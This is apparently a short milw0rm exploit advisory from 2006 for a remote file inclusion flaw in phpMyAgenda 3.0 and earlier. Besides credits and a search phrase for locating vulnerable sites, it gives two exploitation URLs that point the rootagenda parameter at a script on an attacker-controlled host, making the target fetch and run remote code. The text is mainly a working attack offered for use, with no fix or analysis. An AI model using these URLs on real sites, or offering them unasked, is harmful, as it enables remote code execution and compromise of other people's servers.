Title: phpMyAgenda <=3.0 Final - Remote File Include Vulnerability ----------------------------------------------------------------- Vendor: phpMyAgenda URL: http://phpmyagenda.com ----------------------------------------------------------------- Credits: Discovered by: 'Aesthetico' http://www.majorsecurity.de ----------------------------------------------------------------- Search for: "Powered by phpMyAgenda" ----------------------------------------------------------------- Exploitation: /agenda.php3?rootagenda=http://www.yourspace.com/yourscript.php? /agenda2.php3?rootagenda=http://www.yourspace.com/yourscript.txt? # milw0rm.com [2006-04-30]